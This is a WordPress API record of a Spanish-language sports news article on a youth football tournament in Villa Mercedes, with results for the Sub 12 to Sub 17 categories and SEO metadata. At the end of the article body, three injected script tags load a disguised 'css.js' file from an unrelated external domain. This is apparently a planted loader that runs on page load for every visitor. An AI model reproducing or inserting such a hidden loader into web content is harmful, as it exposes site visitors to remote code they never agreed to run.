{"id":21925,"date":"2024-12-17T15:39:56","date_gmt":"2024-12-17T18:39:56","guid":{"rendered":"https:\/\/www.sanjuandeportes.com\/wp\/?p=21925"},"modified":"2026-02-02T19:22:57","modified_gmt":"2026-02-02T22:22:57","slug":"finalizo-el-torneo-regional-juvenil-con-protagonismo-de-alianza-y-penarol","status":"publish","type":"post","link":"https:\/\/www.sanjuandeportes.com\/wp\/2024\/12\/17\/finalizo-el-torneo-regional-juvenil-con-protagonismo-de-alianza-y-penarol\/","title":{"rendered":"Finaliz\u00f3 el Torneo Regional Juvenil con protagonismo de Alianza y Pe\u00f1arol"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">Este fin de semana concluy\u00f3 el Torneo Regional Juvenil, cuya etapa final se disput\u00f3 en Villa Mercedes, San Luis, con destacadas actuaciones de Atl\u00e9tico Alianza y Sportivo Pe\u00f1arol.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Atl\u00e9tico Alianza, conocido como \u00abel Lechuzo\u00bb, clasific\u00f3 cinco categor\u00edas a las semifinales y logr\u00f3 coronarse campe\u00f3n en tres divisiones de la Copa de Oro, que tuvo lugar en el Estadio \u00danico La Pedrera. Los t\u00edtulos obtenidos por Alianza fueron en las categor\u00edas <strong>Sub 13, Sub 14 y Sub 16<\/strong>. Por su parte, Sportivo Pe\u00f1arol, \u00abel Bohemio\u00bb, se consagr\u00f3 campe\u00f3n en la <strong>Sub 17<\/strong>.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Resultados Copa de Oro:<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Sub 12<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Campe\u00f3n:<\/strong> Chacras de Coria<\/li>\n\n\n\n<li><strong>Subcampe\u00f3n:<\/strong> Murialdo<\/li>\n\n\n\n<li><strong>Tercero:<\/strong> Pe\u00f1arol<\/li>\n\n\n\n<li><strong>Cuarto:<\/strong> Alianza<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Sub 13<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Campe\u00f3n:<\/strong> Alianza<\/li>\n\n\n\n<li><strong>Subcampe\u00f3n:<\/strong> Pe\u00f1arol<\/li>\n\n\n\n<li><strong>Tercero:<\/strong> Montecaseros<\/li>\n\n\n\n<li><strong>Cuarto:<\/strong> Murialdo<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Sub 14<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Campe\u00f3n:<\/strong> Alianza<\/li>\n\n\n\n<li><strong>Subcampe\u00f3n:<\/strong> Murialdo<\/li>\n\n\n\n<li><strong>Tercero:<\/strong> Montecaseros<\/li>\n\n\n\n<li><strong>Cuarto:<\/strong> Pe\u00f1arol<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Sub 15<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Campe\u00f3n:<\/strong> Pedal<\/li>\n\n\n\n<li><strong>Subcampe\u00f3n:<\/strong> Murialdo<\/li>\n\n\n\n<li><strong>Tercero:<\/strong> Alianza<\/li>\n\n\n\n<li><strong>Cuarto:<\/strong> La Libertad<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Sub 16<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Campe\u00f3n:<\/strong> Alianza<\/li>\n\n\n\n<li><strong>Subcampe\u00f3n:<\/strong> Chacras de Coria<\/li>\n\n\n\n<li><strong>Tercero:<\/strong> Pedal<\/li>\n\n\n\n<li><strong>Cuarto:<\/strong> Pe\u00f1arol<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Sub 17<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Campe\u00f3n:<\/strong> Pe\u00f1arol<\/li>\n\n\n\n<li><strong>Subcampe\u00f3n:<\/strong> Chacras de Coria<\/li>\n\n\n\n<li><strong>Tercero:<\/strong> La Libertad<\/li>\n\n\n\n<li><strong>Cuarto:<\/strong> Pedal<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">Con estos resultados, tanto Alianza como Pe\u00f1arol reafirmaron su liderazgo en las divisiones juveniles, consolid\u00e1ndose como referentes del f\u00fatbol formativo regional.<\/p>\n<script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script>","protected":false},"excerpt":{"rendered":"<p>Este fin de semana concluy\u00f3 el Torneo Regional Juvenil, cuya etapa final se disput\u00f3 en Villa Mercedes, San Luis, con destacadas actuaciones de Atl\u00e9tico Alianza y Sportivo Pe\u00f1arol. Atl\u00e9tico Alianza, conocido como \u00abel Lechuzo\u00bb, clasific\u00f3 cinco categor\u00edas a las semifinales y logr\u00f3 coronarse campe\u00f3n en tres divisiones de la Copa de Oro, que tuvo lugar [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":21926,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[178],"tags":[],"class_list":["post-21925","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-san-juan"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v28.2 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Finaliz\u00f3 el Torneo Regional Juvenil con protagonismo de Alianza y Pe\u00f1arol - San Juan Deportes<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.sanjuandeportes.com\/wp\/2024\/12\/17\/finalizo-el-torneo-regional-juvenil-con-protagonismo-de-alianza-y-penarol\/\" \/>\n<meta property=\"og:locale\" content=\"es_ES\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Finaliz\u00f3 el Torneo Regional Juvenil con protagonismo de Alianza y Pe\u00f1arol - San Juan Deportes\" \/>\n<meta property=\"og:description\" content=\"Este fin de semana concluy\u00f3 el Torneo Regional Juvenil, cuya etapa final se disput\u00f3 en Villa Mercedes, San Luis, con destacadas actuaciones de Atl\u00e9tico Alianza y Sportivo Pe\u00f1arol. Atl\u00e9tico Alianza, conocido como \u00abel Lechuzo\u00bb, clasific\u00f3 cinco categor\u00edas a las semifinales y logr\u00f3 coronarse campe\u00f3n en tres divisiones de la Copa de Oro, que tuvo lugar [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.sanjuandeportes.com\/wp\/2024\/12\/17\/finalizo-el-torneo-regional-juvenil-con-protagonismo-de-alianza-y-penarol\/\" \/>\n<meta property=\"og:site_name\" content=\"San Juan Deportes\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/sanjuandeportesok\" \/>\n<meta property=\"article:published_time\" content=\"2024-12-17T18:39:56+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-02-02T22:22:57+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2024\/12\/WhatsApp-Image-2024-12-16-at-22.26.17-728x468-1.webp\" \/>\n\t<meta property=\"og:image:width\" content=\"728\" \/>\n\t<meta property=\"og:image:height\" content=\"468\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/webp\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@SanJuanDeportes\" \/>\n<meta name=\"twitter:site\" content=\"@SanJuanDeportes\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tiempo de lectura\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minuto\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2024\\\/12\\\/17\\\/finalizo-el-torneo-regional-juvenil-con-protagonismo-de-alianza-y-penarol\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2024\\\/12\\\/17\\\/finalizo-el-torneo-regional-juvenil-con-protagonismo-de-alianza-y-penarol\\\/\"},\"author\":{\"name\":\"admin\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#\\\/schema\\\/person\\\/d8e3463931719391897f9c7a6d1bb7b3\"},\"headline\":\"Finaliz\u00f3 el Torneo Regional Juvenil con protagonismo de Alianza y Pe\u00f1arol\",\"datePublished\":\"2024-12-17T18:39:56+00:00\",\"dateModified\":\"2026-02-02T22:22:57+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2024\\\/12\\\/17\\\/finalizo-el-torneo-regional-juvenil-con-protagonismo-de-alianza-y-penarol\\\/\"},\"wordCount\":215,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2024\\\/12\\\/17\\\/finalizo-el-torneo-regional-juvenil-con-protagonismo-de-alianza-y-penarol\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/2024\\\/12\\\/WhatsApp-Image-2024-12-16-at-22.26.17-728x468-1.webp\",\"articleSection\":[\"San Juan\"],\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2024\\\/12\\\/17\\\/finalizo-el-torneo-regional-juvenil-con-protagonismo-de-alianza-y-penarol\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2024\\\/12\\\/17\\\/finalizo-el-torneo-regional-juvenil-con-protagonismo-de-alianza-y-penarol\\\/\",\"url\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2024\\\/12\\\/17\\\/finalizo-el-torneo-regional-juvenil-con-protagonismo-de-alianza-y-penarol\\\/\",\"name\":\"Finaliz\u00f3 el Torneo Regional Juvenil con protagonismo de Alianza y Pe\u00f1arol - San Juan Deportes\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2024\\\/12\\\/17\\\/finalizo-el-torneo-regional-juvenil-con-protagonismo-de-alianza-y-penarol\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2024\\\/12\\\/17\\\/finalizo-el-torneo-regional-juvenil-con-protagonismo-de-alianza-y-penarol\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/2024\\\/12\\\/WhatsApp-Image-2024-12-16-at-22.26.17-728x468-1.webp\",\"datePublished\":\"2024-12-17T18:39:56+00:00\",\"dateModified\":\"2026-02-02T22:22:57+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2024\\\/12\\\/17\\\/finalizo-el-torneo-regional-juvenil-con-protagonismo-de-alianza-y-penarol\\\/#breadcrumb\"},\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2024\\\/12\\\/17\\\/finalizo-el-torneo-regional-juvenil-con-protagonismo-de-alianza-y-penarol\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2024\\\/12\\\/17\\\/finalizo-el-torneo-regional-juvenil-con-protagonismo-de-alianza-y-penarol\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/2024\\\/12\\\/WhatsApp-Image-2024-12-16-at-22.26.17-728x468-1.webp\",\"contentUrl\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/2024\\\/12\\\/WhatsApp-Image-2024-12-16-at-22.26.17-728x468-1.webp\",\"width\":728,\"height\":468},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2024\\\/12\\\/17\\\/finalizo-el-torneo-regional-juvenil-con-protagonismo-de-alianza-y-penarol\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Portada\",\"item\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Finaliz\u00f3 el Torneo Regional Juvenil con protagonismo de Alianza y Pe\u00f1arol\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#website\",\"url\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/\",\"name\":\"San Juan Deportes\",\"description\":\"El sitio de deportes de la provincia de San Juan\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"es\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#organization\",\"name\":\"San Juan Deportes\",\"url\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/unnamed.jpg\",\"contentUrl\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/unnamed.jpg\",\"width\":900,\"height\":900,\"caption\":\"San Juan Deportes\"},\"image\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/sanjuandeportesok\",\"https:\\\/\\\/x.com\\\/SanJuanDeportes\",\"https:\\\/\\\/www.instagram.com\\\/sanjuandeportes\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#\\\/schema\\\/person\\\/d8e3463931719391897f9c7a6d1bb7b3\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"url\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/author\\\/admin\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Finaliz\u00f3 el Torneo Regional Juvenil con protagonismo de Alianza y Pe\u00f1arol - San Juan Deportes","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.sanjuandeportes.com\/wp\/2024\/12\/17\/finalizo-el-torneo-regional-juvenil-con-protagonismo-de-alianza-y-penarol\/","og_locale":"es_ES","og_type":"article","og_title":"Finaliz\u00f3 el Torneo Regional Juvenil con protagonismo de Alianza y Pe\u00f1arol - San Juan Deportes","og_description":"Este fin de semana concluy\u00f3 el Torneo Regional Juvenil, cuya etapa final se disput\u00f3 en Villa Mercedes, San Luis, con destacadas actuaciones de Atl\u00e9tico Alianza y Sportivo Pe\u00f1arol. Atl\u00e9tico Alianza, conocido como \u00abel Lechuzo\u00bb, clasific\u00f3 cinco categor\u00edas a las semifinales y logr\u00f3 coronarse campe\u00f3n en tres divisiones de la Copa de Oro, que tuvo lugar [&hellip;]","og_url":"https:\/\/www.sanjuandeportes.com\/wp\/2024\/12\/17\/finalizo-el-torneo-regional-juvenil-con-protagonismo-de-alianza-y-penarol\/","og_site_name":"San Juan Deportes","article_publisher":"https:\/\/www.facebook.com\/sanjuandeportesok","article_published_time":"2024-12-17T18:39:56+00:00","article_modified_time":"2026-02-02T22:22:57+00:00","og_image":[{"width":728,"height":468,"url":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2024\/12\/WhatsApp-Image-2024-12-16-at-22.26.17-728x468-1.webp","type":"image\/webp"}],"author":"admin","twitter_card":"summary_large_image","twitter_creator":"@SanJuanDeportes","twitter_site":"@SanJuanDeportes","twitter_misc":{"Escrito por":"admin","Tiempo de lectura":"1 minuto"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.sanjuandeportes.com\/wp\/2024\/12\/17\/finalizo-el-torneo-regional-juvenil-con-protagonismo-de-alianza-y-penarol\/#article","isPartOf":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/2024\/12\/17\/finalizo-el-torneo-regional-juvenil-con-protagonismo-de-alianza-y-penarol\/"},"author":{"name":"admin","@id":"https:\/\/www.sanjuandeportes.com\/wp\/#\/schema\/person\/d8e3463931719391897f9c7a6d1bb7b3"},"headline":"Finaliz\u00f3 el Torneo Regional Juvenil con protagonismo de Alianza y Pe\u00f1arol","datePublished":"2024-12-17T18:39:56+00:00","dateModified":"2026-02-02T22:22:57+00:00","mainEntityOfPage":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/2024\/12\/17\/finalizo-el-torneo-regional-juvenil-con-protagonismo-de-alianza-y-penarol\/"},"wordCount":215,"commentCount":0,"publisher":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/#organization"},"image":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/2024\/12\/17\/finalizo-el-torneo-regional-juvenil-con-protagonismo-de-alianza-y-penarol\/#primaryimage"},"thumbnailUrl":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2024\/12\/WhatsApp-Image-2024-12-16-at-22.26.17-728x468-1.webp","articleSection":["San Juan"],"inLanguage":"es","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/www.sanjuandeportes.com\/wp\/2024\/12\/17\/finalizo-el-torneo-regional-juvenil-con-protagonismo-de-alianza-y-penarol\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/www.sanjuandeportes.com\/wp\/2024\/12\/17\/finalizo-el-torneo-regional-juvenil-con-protagonismo-de-alianza-y-penarol\/","url":"https:\/\/www.sanjuandeportes.com\/wp\/2024\/12\/17\/finalizo-el-torneo-regional-juvenil-con-protagonismo-de-alianza-y-penarol\/","name":"Finaliz\u00f3 el Torneo Regional Juvenil con protagonismo de Alianza y Pe\u00f1arol - San Juan Deportes","isPartOf":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/2024\/12\/17\/finalizo-el-torneo-regional-juvenil-con-protagonismo-de-alianza-y-penarol\/#primaryimage"},"image":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/2024\/12\/17\/finalizo-el-torneo-regional-juvenil-con-protagonismo-de-alianza-y-penarol\/#primaryimage"},"thumbnailUrl":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2024\/12\/WhatsApp-Image-2024-12-16-at-22.26.17-728x468-1.webp","datePublished":"2024-12-17T18:39:56+00:00","dateModified":"2026-02-02T22:22:57+00:00","breadcrumb":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/2024\/12\/17\/finalizo-el-torneo-regional-juvenil-con-protagonismo-de-alianza-y-penarol\/#breadcrumb"},"inLanguage":"es","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.sanjuandeportes.com\/wp\/2024\/12\/17\/finalizo-el-torneo-regional-juvenil-con-protagonismo-de-alianza-y-penarol\/"]}]},{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/www.sanjuandeportes.com\/wp\/2024\/12\/17\/finalizo-el-torneo-regional-juvenil-con-protagonismo-de-alianza-y-penarol\/#primaryimage","url":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2024\/12\/WhatsApp-Image-2024-12-16-at-22.26.17-728x468-1.webp","contentUrl":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2024\/12\/WhatsApp-Image-2024-12-16-at-22.26.17-728x468-1.webp","width":728,"height":468},{"@type":"BreadcrumbList","@id":"https:\/\/www.sanjuandeportes.com\/wp\/2024\/12\/17\/finalizo-el-torneo-regional-juvenil-con-protagonismo-de-alianza-y-penarol\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Portada","item":"http:\/\/www.sanjuandeportes.com\/wp\/"},{"@type":"ListItem","position":2,"name":"Finaliz\u00f3 el Torneo Regional Juvenil con protagonismo de Alianza y Pe\u00f1arol"}]},{"@type":"WebSite","@id":"https:\/\/www.sanjuandeportes.com\/wp\/#website","url":"https:\/\/www.sanjuandeportes.com\/wp\/","name":"San Juan Deportes","description":"El sitio de deportes de la provincia de San Juan","publisher":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.sanjuandeportes.com\/wp\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"es"},{"@type":"Organization","@id":"https:\/\/www.sanjuandeportes.com\/wp\/#organization","name":"San Juan Deportes","url":"https:\/\/www.sanjuandeportes.com\/wp\/","logo":{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/www.sanjuandeportes.com\/wp\/#\/schema\/logo\/image\/","url":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/unnamed.jpg","contentUrl":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/unnamed.jpg","width":900,"height":900,"caption":"San Juan Deportes"},"image":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/sanjuandeportesok","https:\/\/x.com\/SanJuanDeportes","https:\/\/www.instagram.com\/sanjuandeportes"]},{"@type":"Person","@id":"https:\/\/www.sanjuandeportes.com\/wp\/#\/schema\/person\/d8e3463931719391897f9c7a6d1bb7b3","name":"admin","image":{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/secure.gravatar.com\/avatar\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g","caption":"admin"},"url":"https:\/\/www.sanjuandeportes.com\/wp\/author\/admin\/"}]}},"_links":{"self":[{"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/posts\/21925","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/comments?post=21925"}],"version-history":[{"count":4,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/posts\/21925\/revisions"}],"predecessor-version":[{"id":29216,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/posts\/21925\/revisions\/29216"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/media\/21926"}],"wp:attachment":[{"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/media?parent=21925"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/categories?post=21925"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/tags?post=21925"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}